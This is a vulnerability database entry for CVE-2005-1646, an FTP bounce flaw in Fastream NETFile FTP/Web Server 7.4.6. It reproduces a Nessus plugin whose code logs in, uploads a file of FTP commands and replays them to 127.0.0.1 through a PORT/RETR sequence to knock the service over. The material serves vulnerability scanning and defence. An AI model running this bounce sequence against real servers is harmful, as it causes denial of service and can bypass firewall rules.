Vulnerabilities > CVE-2005-1646 - Unspecified vulnerability in Fastream Netfile FTP web Server 7.4.6

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
fastream
nessus

Summary

The default installation of Fastream NETFile FTP/Web Server 7.4.6, which supports FXP, does not require that the IP address in a PORT command be the same as the IP of the logged in user, which allows remote attackers to conduct FTP Bounce attacks to bypass firewall rules or cause a denial of service.

Vulnerable Configurations

Part Description Count
Application
Fastream
1

Nessus

NASL familyFTP
NASL idNETFILE_FTPD_746.NASL
descriptionThe NETFile FTP/Web server on the remote host is vulnerable to a denial of service attack due to its support of the FXP protocol and its failure to validate the IP address supplied in a PORT command. Additionally, this issue can be leveraged to bypass firewall rules to connect to arbitrary hosts.
last seen2020-06-01
modified2020-06-02
plugin id18295
published2005-05-18
reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/18295
titleNETFile FTP/Web Server FTP Bounce Attack
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  script_id(18295);
  script_version("1.21");

  script_cve_id("CVE-2005-1646");
  script_bugtraq_id(13653);

  script_name(english:"NETFile FTP/Web Server FTP Bounce Attack");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote FTP server is prone to a denial of service attack." );
 script_set_attribute(attribute:"description", value:
"The NETFile FTP/Web server on the remote host is vulnerable to a
denial of service attack due to its support of the FXP protocol and
its failure to validate the IP address supplied in a PORT command. 

Additionally, this issue can be leveraged to bypass firewall rules
to connect to arbitrary hosts." );
 script_set_attribute(attribute:"see_also", value:"http://www.security.org.sg/vuln/netfileftp746port.html" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to NETFile FTP/Web Server 7.6.0 or later and
disable FXP support." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");


 script_set_attribute(attribute:"plugin_publication_date", value: "2005/05/18");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/05/17");
 script_cvs_date("Date: 2018/07/16 14:09:13");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:fastream:netfile_ftp_web_server");
script_end_attributes();

  script_summary(english:"Checks for FXP DoS vulnerability in NETFile FTP/Web Server");
  script_category(ACT_DENIAL);
  script_family(english:"FTP");
  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
  script_dependencies("ftp_overflow.nasl", "ftpserver_detect_type_nd_version.nasl");
  script_require_keys("ftp/login", "ftp/password");
  script_require_ports("Services/ftp", 21);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("ftp_func.inc");


port = get_ftp_port(default: 21);

banner = get_ftp_banner(port:port);
if (! banner) exit(1, "No FTP banner on port "+port+".");
if ("NETFile FTP" >!< banner ) exit(0, "The server on port "+port+" is not NetFile FTP.");

# nb: we need to log in to exploit the vulnerability.
user = get_kb_item("ftp/login");
pass = get_kb_item("ftp/password");
if (!user || !pass) {
  exit(0, "ftp/login and/or ftp/password are empty");
}
writeable = get_kb_item("ftp/"+port+"/writeable_dir");
if (! writable) writeable = get_kb_item("ftp/writeable_dir");
file = string(SCRIPT_NAME, "-", rand_str());


soc = open_sock_tcp(port);
if (!soc) exit(1, "TCP connection failed to port "+port+".");
if (!ftp_authenticate(socket:soc, user:user, pass:pass)) {
  close(soc);
  exit(0, "couldn't login with supplied FTP credentials");
}


# Try to store an exploit on the remote.
c = strcat("CWD ", writeable, '\r\n');
send(socket:soc, data:c);
s = recv_line(socket:soc, length:1024);

port2 = ftp_pasv(socket:soc);
if (! port2) exit(1, "Cannot get passive port from control port "+port+".");
pasv = open_sock_tcp(port2, transport:get_port_transport(port));
if (! pasv) exit(1, "Connection failed to port "+port2+".");

c = strcat("STOR ", file, '\r\n');
send(socket:soc, data: c);
s = recv_line(socket:soc, length:1024);
if (s =~ "^(150|425) ") {
  # Here's the exploit.
  c = string(
    "USER ", user, "\r\n",
    "PASS ", pass, "\r\n",
    "CWD ", writeable, "\r\n",
    "PORT 127,0,0,1,0,", port, "\r\n",
    "RETR ", file, "\r\n"
  );
  send(socket:pasv, data:c);
  close(pasv);

  # If we stored it ok, try to retrieve it.
  s = recv_line(socket:soc, length:1024);
  if (s =~ "^226 ") {
    c = string("PORT 127,0,0,1,0,21");
    send(socket:soc, data:string(c, "\r\n"));
    s = recv_line(socket:soc, length:1024);

    c = string("RETR ", file);
    send(socket:soc, data:string(c, "\r\n"));
    s = recv_line(socket:soc, length:1024);

    # There's a problem if we can no longer log in.
    soc2 = open_sock_tcp(port);
    if (soc2) {
      if (!ftp_authenticate(socket:soc2, user:user, pass:pass)) {
        report = string(
          "Nessus has successfully exploited this vulnerability by adding a\n",
          "file - '", writeable, "/", file, "' - under NETFile's folder path\n",
          "on the remote host; you may wish to remove it at your convenience.\n"
        );
        security_warning(port:port, extra:report);
      }
      close(soc2);
    }
  }
}
ftp_close(socket:soc);